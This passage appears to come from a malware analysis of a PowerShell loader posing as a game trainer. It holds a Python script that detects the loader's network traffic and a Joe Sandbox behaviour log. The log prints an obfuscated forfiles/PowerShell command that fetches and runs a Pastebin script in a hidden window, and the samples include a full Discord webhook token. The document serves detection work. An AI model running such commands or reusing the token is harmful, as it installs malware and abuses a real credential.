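    f"GET {REPO}Backend.dll HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: raw.githubusercontent.com\r\nConnection: Keep-Alive\r\n\r\n",
    f"GET {REPO}FH5.exe HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: raw.githubusercontent.com\r\n\r\n",
    f"GET /raw/sA04Mwk2 HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: pastebin.com\r\nConnection: Keep-Alive\r\n\r\n",
    f"GET {REPO}gaber.txt HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: raw.githubusercontent.com\r\nConnection: Keep-Alive\r\n\r\n",
    f"POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1\r\n"
    f"User-Agent: {UA}\r\nContent-Type: application/json\r\nHost: discord.com\r\nContent-Length: 215\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /octocat/Hello-World/main/README HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n"
    "Host: raw.githubusercontent.com\r\n\r\n",
]

WEBHOOK_PATH = re.compile(r"^/api/webhooks/(\d+)/[\w-]+")
PAYLOAD_EXTENSIONS = (".dll", ".exe", ".ps1", ".txt")


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.1 request head into method, path and lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method.upper(), "path": path, "headers": headers}


def classify(req: dict) -> list:
    """Tag one request with the loader behaviours seen in this sample."""
    host = req["headers"].get("host", "").lower()
    ua = req["headers"].get("user-agent", "")
    path = req["path"]
    tags = []
    if "WindowsPowerShell/" in ua:            # Invoke-WebRequest's default UA; no browser sends it
        tags.append("powershell-ua")
    if host == "raw.githubusercontent.com" and path.lower().endswith(PAYLOAD_EXTENSIONS):
        tags.append("github-raw-payload")     # second-stage DLL/EXE, or the polled .txt, from a repo
    if host == "pastebin.com" and path.startswith("/raw/"):
        tags.append("pastebin-raw-stager")    # script body fetched for Invoke-Expression
    if host == "discord.com" and req["method"] == "POST" and WEBHOOK_PATH.match(path):
        tags.append("discord-webhook-post")   # JSON beacon/exfil to a webhook
    return tags


def is_suspicious(tags: list) -> bool:
    # GitHub, Pastebin and Discord are legitimate services, so the host alone is not
    # an indicator; require the PowerShell client plus at least one staging/exfil pattern.
    return "powershell-ua" in tags and len(tags) > 1


def webhook_id(path: str):
    """Numeric webhook ID: the stable part to block or report (the token after it is a secret)."""
    m = WEBHOOK_PATH.match(path)
    return m.group(1) if m else None


def triage(raw_requests: list) -> list:
    findings = []
    for raw in raw_requests:
        req = parse_request(raw)
        tags = classify(req)
        if is_suspicious(tags):
            findings.append({"method": req["method"], "host": req["headers"].get("host", ""),
                             "path": req["path"], "tags": tags, "webhook_id": webhook_id(req["path"])})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REQUESTS):
        print(f["method"], f["host"] + f["path"][:48], f["tags"], f["webhook_id"] or "")
```

Feed it the request heads from a proxy log or a PCAP and it yields five findings for the report's traffic and none for the constructed browser request. The webhook ID is the field worth keeping in a blocklist or abuse report; the token that follows it is a credential and should not be re-published.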

System Summary

Source: amsi64_7548.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7912.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Backend.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFAAC640752
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFAAC63F9A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFAAC64BCF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFAAC6410FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFAAC6411D3
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Code function: 6_2_00007FFB22652720
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Code function: 6_2_00007FFAAC661A48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFAAC66C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFAAC66B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFAAC66D1B1
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Backend.dll 05FF6FB5A27E37AAB0269106830A0E1A56C709428AB130BBDDEFF737452E6FE3
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe E87B1FCB789B6957B5C99A1393738E928D3918F1E46DB20F761D57AD015AA385
Source: Stand_Trainer_Updated.exe.1.dr | Static PE information: No import functions for PE file found
Source: amsi64_7548.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7912.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal96.troj.expl.evad.winPS1@23/27@3/4
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Code function: 6_2_00007FFB22652010 CreateToolhelp32Snapshot,Process32First,strcmp,Process32Next
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3yvnkqr.fyx.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
